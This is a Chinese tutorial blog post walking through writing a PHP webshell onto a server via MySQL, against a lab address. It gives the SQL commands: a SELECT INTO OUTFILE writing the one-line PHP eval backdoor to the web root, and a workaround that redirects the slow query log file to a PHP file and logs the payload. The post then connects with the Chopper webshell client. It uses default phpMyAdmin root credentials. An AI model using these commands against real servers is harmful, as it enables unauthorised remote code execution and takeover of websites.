42、利用sql语句写入shell

简介: 42、利用sql语句写入shell

目标ip:192.168.52.143


一、御剑扫描该地址

0a2653c851af460fa595bd959398a8f1.png

获取到重要信息:


1、网站的绝对路径

0eacb84100b54626af849e6b562bf92a.png

2、phpmyadmin,并且是默认账号密码:root

2d65d23f6d4748949b924e4057485923.png

二、登录数据口后台,写入一句话木马


select ‘<?php eval($_POST[x]);?>’ into outfile ‘c:/phpstudy/www/xx.php’


执行的时候报错

0a2653c851af460fa595bd959398a8f1.png


解决方法:


1、设置slow_query_log=1 启用慢查询日志。

0eacb84100b54626af849e6b562bf92a.png


2、修改slow_query_log_file日志文件的绝对路径以及文件名

set global slow_query_log_file=‘c:/phpstudy/www/xx.php’

2d65d23f6d4748949b924e4057485923.png


3、向日志文件写入一句话

select ‘<?php eval($_POST[x]);?>’ or sleep(11)

2e9b90b2ca334476abebe75bafe6eeaa.png

三、用菜刀链接

4cebaac233b3433da32a72337a77fc60.png


禁止非法,后果自负


目录
相关文章
|
9天前
|
SQL 安全 Shell
小课堂 -- 利用sql语句写入shell
小课堂 -- 利用sql语句写入shell
24 0
|
9天前
|
SQL 关系型数据库 Shell
postgresql|数据库|批量执行SQL脚本文件的shell脚本
postgresql|数据库|批量执行SQL脚本文件的shell脚本
170 0
|
12月前
|
Oracle 关系型数据库 数据库
新建Oracle 数据库的Shell+SQL脚本
不用图形界面,也不用DBCA的静默方式,下面是用Shell+SQL创建Oracle数据库的脚本。
136 0
|
SQL 关系型数据库 MySQL
SQL注入:为什么拿不到os-shell?
SQL注入:为什么拿不到os-shell?
|
SQL Shell PHP
某教程学习笔记(一):19、任意文件上传和sql语句拿shell
某教程学习笔记(一):19、任意文件上传和sql语句拿shell
80 0
某教程学习笔记(一):19、任意文件上传和sql语句拿shell
|
SQL Shell 数据库
shell 自动导出导入数据库,将导出的格式为 : 数据库名+时间.sql
mysqldump 自动导出mysql8 or mariadb10x 数据库工具,导入数据库工具,mysql 创建于删除数据库
150 0
|
SQL 存储 Shell
hive统计每日的活跃用户和新用户sql开发(附shell脚本)
hive统计每日的活跃用户和新用户sql开发(附shell脚本)
hive统计每日的活跃用户和新用户sql开发(附shell脚本)
|
SQL 存储 关系型数据库
《懒人Shell脚本》之六——一键构造待采集批量sql语句
1、需求 采集任务构造入库。实现200多个网站的标题、时间、内容等信息的采集信息配置,并插入mysql中
184 0
《懒人Shell脚本》之六——一键构造待采集批量sql语句
|
SQL 关系型数据库 应用服务中间件
|
9天前
|
分布式计算 Hadoop Shell
使用shell脚本实现自动SSH互信功能
使用shell脚本实现自动SSH互信功能
22 1